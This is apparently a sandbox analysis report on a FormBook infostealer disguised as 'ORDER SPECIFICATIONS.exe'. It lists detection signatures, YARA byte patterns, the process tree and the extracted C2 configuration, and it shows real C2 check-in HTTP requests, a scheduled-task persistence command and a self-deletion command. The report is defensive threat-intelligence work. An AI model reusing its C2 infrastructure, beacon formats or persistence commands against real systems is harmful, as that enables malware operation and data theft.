Loading ...

Play interactive tourEdit tour

Analysis Report ORDER SPECIFICATIONS.exe

Overview

General Information

Sample Name:ORDER SPECIFICATIONS.exe
Analysis ID:356492
MD5:e75a4df51162401b21c3eb79718fb3db
SHA1:3328ead22db03ce461cb8bdb5d59638120e2444f
SHA256:48709c3e07c128283d9d550331d6e5f7c4afeadfc61cad94d769ea8ce7399e77
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large strings
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • ORDER SPECIFICATIONS.exe (PID: 6336 cmdline: 'C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe' MD5: E75A4DF51162401B21C3EB79718FB3DB)
    • schtasks.exe (PID: 6476 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\LvZiFDk' /XML 'C:\Users\user\AppData\Local\Temp\tmpDA15.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • ORDER SPECIFICATIONS.exe (PID: 6520 cmdline: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe MD5: E75A4DF51162401B21C3EB79718FB3DB)
    • ORDER SPECIFICATIONS.exe (PID: 6552 cmdline: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe MD5: E75A4DF51162401B21C3EB79718FB3DB)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • chkdsk.exe (PID: 6364 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: 2D5A2497CB57C374B3AE3080FF9186FB)
          • cmd.exe (PID: 5308 cmdline: /c del 'C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.athomecp.com/owws/"], "decoy": ["trolljoke.com", "contex3.info", "jabashir51.com", "brittand.com", "djaya.asia", "lab-wealth.com", "greyfriararabians.com", "oxfordhabits.com", "softwaresreports.info", "abjms.com", "winsteadarchitecture.com", "brucerolfsboulder.com", "unitytribune.com", "cyjulebu.com", "abaplants.com", "theexerciseforyou.com", "codigodebarrasser.com", "barbicanroadproductions.com", "sportenango.com", "hostsnc.com", "clubdonovoka.com", "adaptive.science", "meeplesisters.com", "shubhkari.com", "pooliswaiting.com", "sempat-ya8.com", "davispackphotography.com", "dezigo.design", "faxbbs.com", "lunarvac.com", "thewerideveloper.com", "ingenesinstitute.com", "elizabethfulco.com", "assemble-4u.com", "jingcilian.com", "rnpynsjw.net", "raphainfosec.com", "gdzas08.cloud", "murrpurrs.net", "hakua36tokyo.com", "rakennuskolibri.net", "renerossi.com", "raphaelyejesiel.com", "phoxinh.net", "amrshadhartanah21.com", "thehoneyglo.com", "xn--mariachilen-zeb.com", "excelfaq.online", "expandetusingresos.com", "cupsteam.com", "your-new-body-plan.com", "misskarenenglishreacher.com", "pulkitkumar.wtf", "tluxebeautyexperience.com", "sissysundays.com", "ketoburnerrevolution.com", "babdestaffing.com", "easywayplanet.com", "rewealth.club", "siamboss.com", "shamansmoke.com", "truervoice.com", "denisekohli.com", "gx17.net"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.ORDER SPECIFICATIONS.exe.2b26b2c.1.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
        5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x166a9:$sqlite3step: 68 34 1C 7B E1
          • 0x167bc:$sqlite3step: 68 34 1C 7B E1
          • 0x166d8:$sqlite3text: 68 38 2A 90 C5
          • 0x167fd:$sqlite3text: 68 38 2A 90 C5
          • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
          • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
          5.2.ORDER SPECIFICATIONS.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            Click to see the 8 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Scheduled temp file as task from temp locationShow sources
            Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\LvZiFDk' /XML 'C:\Users\user\AppData\Local\Temp\tmpDA15.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\LvZiFDk' /XML 'C:\Users\user\AppData\Local\Temp\tmpDA15.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe' , ParentImage: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe, ParentProcessId: 6336, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\LvZiFDk' /XML 'C:\Users\user\AppData\Local\Temp\tmpDA15.tmp', ProcessId: 6476

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpackMalware Configuration Extractor: FormBook {"C2 list": ["www.athomecp.com/owws/"], "decoy": ["trolljoke.com", "contex3.info", "jabashir51.com", "brittand.com", "djaya.asia", "lab-wealth.com", "greyfriararabians.com", "oxfordhabits.com", "softwaresreports.info", "abjms.com", "winsteadarchitecture.com", "brucerolfsboulder.com", "unitytribune.com", "cyjulebu.com", "abaplants.com", "theexerciseforyou.com", "codigodebarrasser.com", "barbicanroadproductions.com", "sportenango.com", "hostsnc.com", "clubdonovoka.com", "adaptive.science", "meeplesisters.com", "shubhkari.com", "pooliswaiting.com", "sempat-ya8.com", "davispackphotography.com", "dezigo.design", "faxbbs.com", "lunarvac.com", "thewerideveloper.com", "ingenesinstitute.com", "elizabethfulco.com", "assemble-4u.com", "jingcilian.com", "rnpynsjw.net", "raphainfosec.com", "gdzas08.cloud", "murrpurrs.net", "hakua36tokyo.com", "rakennuskolibri.net", "renerossi.com", "raphaelyejesiel.com", "phoxinh.net", "amrshadhartanah21.com", "thehoneyglo.com", "xn--mariachilen-zeb.com", "excelfaq.online", "expandetusingresos.com", "cupsteam.com", "your-new-body-plan.com", "misskarenenglishreacher.com", "pulkitkumar.wtf", "tluxebeautyexperience.com", "sissysundays.com", "ketoburnerrevolution.com", "babdestaffing.com", "easywayplanet.com", "rewealth.club", "siamboss.com", "shamansmoke.com", "truervoice.com", "denisekohli.com", "gx17.net"]}
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Roaming\LvZiFDk.exeReversingLabs: Detection: 14%
            Multi AV Scanner detection for submitted fileShow sources
            Source: ORDER SPECIFICATIONS.exeVirustotal: Detection: 30%Perma Link
            Source: ORDER SPECIFICATIONS.exeReversingLabs: Detection: 14%
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.499636949.0000000005370000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.499736122.00000000053A0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.298321628.0000000001450000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.255037540.0000000003AF9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.ORDER SPECIFICATIONS.exe.3c2d0a0.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.ORDER SPECIFICATIONS.exe.3c7ccc0.3.raw.unpack, type: UNPACKEDPE
            Machine Learning detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Roaming\LvZiFDk.exeJoe Sandbox ML: detected
            Machine Learning detection for sampleShow sources
            Source: ORDER SPECIFICATIONS.exeJoe Sandbox ML: detected
            Source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

            Compliance:

            barindex
            Uses 32bit PE filesShow sources
            Source: ORDER SPECIFICATIONS.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
            Source: ORDER SPECIFICATIONS.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Binary contains paths to debug symbolsShow sources
            Source: Binary string: chkdsk.pdbGCTL source: ORDER SPECIFICATIONS.exe, 00000005.00000002.298384357.0000000001480000.00000040.00000001.sdmp
            Source: Binary string: chkdsk.pdb source: ORDER SPECIFICATIONS.exe, 00000005.00000002.298384357.0000000001480000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdbUGP source: ORDER SPECIFICATIONS.exe, 00000005.00000002.298571038.00000000015BF000.00000040.00000001.sdmp, chkdsk.exe, 00000010.00000002.500281857.000000000563F000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: ORDER SPECIFICATIONS.exe, chkdsk.exe
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 4x nop then jmp 0725D85Ch0_2_0725D6FF
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_0725F2E8

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49731 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49731 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49731 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49736 -> 34.90.54.238:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49736 -> 34.90.54.238:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49736 -> 34.90.54.238:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49737 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49737 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49737 -> 34.102.136.180:80
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: www.athomecp.com/owws/
            Source: global trafficHTTP traffic detected: GET /owws/?FZA=E2uPX13Kd8eziNpXwTixT+siYJwH/w0JmCiJBsiXejl5IKklxd2VA8+t7/1UF0B3bHAe&GzrX=Bxo0src HTTP/1.1Host: www.abaplants.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /owws/?FZA=LNtcZ4o3RSbiM3q1XP5+3qPXxFdWCQL8FVzehDhzTe1h59sjzavkswLHMrOSN2WRyLvP&GzrX=Bxo0src HTTP/1.1Host: www.cyjulebu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /owws/?FZA=lwHO/uUGh/aXRG65LDVUqOi7qNbSmHJrcCZCAEgZXo9YpRM01PmoothBQXBavnYq4fuq&GzrX=Bxo0src HTTP/1.1Host: www.denisekohli.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /owws/?FZA=4P1MPend6t3dRr+zrFZAhnBbaZyC76urNt6lzZx4zgRAaIR2wDCeIn43mJ71sHhZDUem&GzrX=Bxo0src HTTP/1.1Host: www.hostsnc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /owws/?FZA=tHbMDDeadmVNgKYcreuncRwf7boUCKl6MNzrWMM5Jrdb4IpAp8+CGbWYAVkD3n9oZQag&GzrX=Bxo0src HTTP/1.1Host: www.assemble-4u.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /owws/?FZA=Ng1hVjXym9Qjh/39zAZuuRZY5wWd2+1a+DNcin6p0h8GUL41G3Uc3DOSlbUNOeobFB2Q&GzrX=Bxo0src HTTP/1.1Host: www.raphaelyejesiel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /owws/?FZA=wQPVVaqxY2IiVfQZkyRmW3q13fIzlgC5jJ34SIKwtgCZdzYlbOYBx3wkbgC3baC7Oc7O&GzrX=Bxo0src HTTP/1.1Host: www.your-new-body-plan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /owws/?FZA=5jCx8TJ67BDPxitFKTiPzVbAv5V4WmfLvz0iUotKb81cdHhoP6D4U31cAoF9J0eWw3xa&GzrX=Bxo0src HTTP/1.1Host: www.softwaresreports.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
            Source: Joe Sandbox ViewASN Name: TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN
            Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
            Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
            Source: global trafficHTTP traffic detected: GET /owws/?FZA=E2uPX13Kd8eziNpXwTixT+siYJwH/w0JmCiJBsiXejl5IKklxd2VA8+t7/1UF0B3bHAe&GzrX=Bxo0src HTTP/1.1Host: www.abaplants.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /owws/?FZA=LNtcZ4o3RSbiM3q1XP5+3qPXxFdWCQL8FVzehDhzTe1h59sjzavkswLHMrOSN2WRyLvP&GzrX=Bxo0src HTTP/1.1Host: www.cyjulebu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /owws/?FZA=lwHO/uUGh/aXRG65LDVUqOi7qNbSmHJrcCZCAEgZXo9YpRM01PmoothBQXBavnYq4fuq&GzrX=Bxo0src HTTP/1.1Host: www.denisekohli.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /owws/?FZA=4P1MPend6t3dRr+zrFZAhnBbaZyC76urNt6lzZx4zgRAaIR2wDCeIn43mJ71sHhZDUem&GzrX=Bxo0src HTTP/1.1Host: www.hostsnc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /owws/?FZA=tHbMDDeadmVNgKYcreuncRwf7boUCKl6MNzrWMM5Jrdb4IpAp8+CGbWYAVkD3n9oZQag&GzrX=Bxo0src HTTP/1.1Host: www.assemble-4u.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /owws/?FZA=Ng1hVjXym9Qjh/39zAZuuRZY5wWd2+1a+DNcin6p0h8GUL41G3Uc3DOSlbUNOeobFB2Q&GzrX=Bxo0src HTTP/1.1Host: www.raphaelyejesiel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /owws/?FZA=wQPVVaqxY2IiVfQZkyRmW3q13fIzlgC5jJ34SIKwtgCZdzYlbOYBx3wkbgC3baC7Oc7O&GzrX=Bxo0src HTTP/1.1Host: www.your-new-body-plan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /owws/?FZA=5jCx8TJ67BDPxitFKTiPzVbAv5V4WmfLvz0iUotKb81cdHhoP6D4U31cAoF9J0eWw3xa&GzrX=Bxo0src HTTP/1.1Host: www.softwaresreports.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: <a href="https://www.facebook.com/casarpontocom" target="_blank" title="Facebook/casarpontocom"> equals www.facebook.com (Facebook)
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: <a href="https://www.youtube.com/casarpontocom" target="_blank" title="Youtube/casarpontocom"> equals www.youtube.com (Youtube)
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: <iframe src="//www.facebook.com/plugins/like.php?href=https%3A%2F%2Ffacebook.com%2FEventoCasar&width&layout=button_count&action=like&show_faces=false&share=false&height=21&appId=621352837957736" scrolling="no" frameborder="0" style="border:none; overflow:hidden; height:21px;" allowTransparency="true"></iframe> equals www.facebook.com (Facebook)
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: src="https://www.facebook.com/tr?id=912779795420526&ev=PageView&noscript=1" equals www.facebook.com (Facebook)
            Source: unknownDNS traffic detected: queries for: www.abaplants.com
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 23 Feb 2021 07:57:48 GMTContent-Type: text/htmlContent-Length: 1039Connection: closeSet-Cookie: security_session_verify=9ebc6a29fa9e7c317eed3150247f3800; expires=Fri, 26-Feb-21 15:57:48 GMT; path=/; HttpOnlyCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 22 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 6e 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6c 6f 73 65 22 2f 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 66 75 6e 63 74 69 6f 6e 20 73 74 72 69 6e 67 54 6f 48 65 78 28 73 74 72 29 7b 76 61 72 20 76 61 6c 3d 22 22 3b 66 6f 72 28 76 61 72 20 69 20 3d 20 30 3b 20 69 20 3c 20 73 74 72 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 7b 69 66 28 76 61 6c 20 3d 3d 20 22 22 29 76 61 6c 20 3d 20 73 74 72 2e 63 68 61 72 43 6f 64 65 41 74 28 69 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 3b 65 6c 73 65 20 76 61 6c 20 2b 3d 20 73 74 72 2e 63 68 61 72 43 6f 64 65 41 74 28 69 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 3b 7d 72 65 74 75 72 6e 20 76 61 6c 3b 7d 66 75 6e 63 74 69 6f 6e 20 59 75 6e 53 75 6f 41 75 74 6f 4a 75 6d 70 28 29 7b 20 76 61 72 20 77 69 64 74 68 20 3d 73 63 72 65 65 6e 2e 77 69 64 74 68 3b 20 76 61 72 20 68 65 69 67 68 74 3d 73 63 72 65 65 6e 2e 68 65 69 67 68 74 3b 20 76 61 72 20 73 63 72 65 65 6e 64 61 74 65 20 3d 20 77 69 64 74 68 20 2b 20 22 2c 22 20 2b 20 68 65 69 67 68 74 3b 76 61 72 20 63 75 72 6c 6f 63 61 74 69 6f 6e 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3b 69 66 28 2d 31 20 3d 3d 20 63 75 72 6c 6f 63 61 74 69 6f 6e 2e 69 6e 64 65 78 4f 66 28 22 73 65 63 75 72 69 74 79 5f 76 65 72 69 66 79 5f 22 29 29 7b 20 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 22 73 72 63 75 72 6c 3d 22 20 2b 20 73 74 72 69 6e 67 54 6f 48 65 78 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 20 2b 20 22 3b 70 61 74 68 3d 2f 3b 22 3b 7d 73 65 6c 66 2e 6c 6f 63 61 74 69 6f 6e 20 3d 20 22 2f 6f 77 77 73 2f 3f 46 5a 41 3d 4c 4e 74 63 5a 34 6f 33 52 53 62 69 4d 33 71 31 58 50 35 20 33 71 50 58 78 46 64 57 43 51 4c 38 46 56 7a 65 68 44 68 7a 54 65 31 68 35 39 73 6a 7a 61 76 6b 73 77 4c 48 4d 72 4f 53 4e 32 57 52 79 4c 76 50 26 47 7a 72 58 3d 42 7
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.232661881.000000000121D000.00000004.00000001.sdmpString found in binary or memory: http://en.wX
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: http://instagram.com/casarpontocom
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.261901918.0000000007260000.00000004.00000001.sdmpString found in binary or memory: http://schemas.microsoft.nh
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
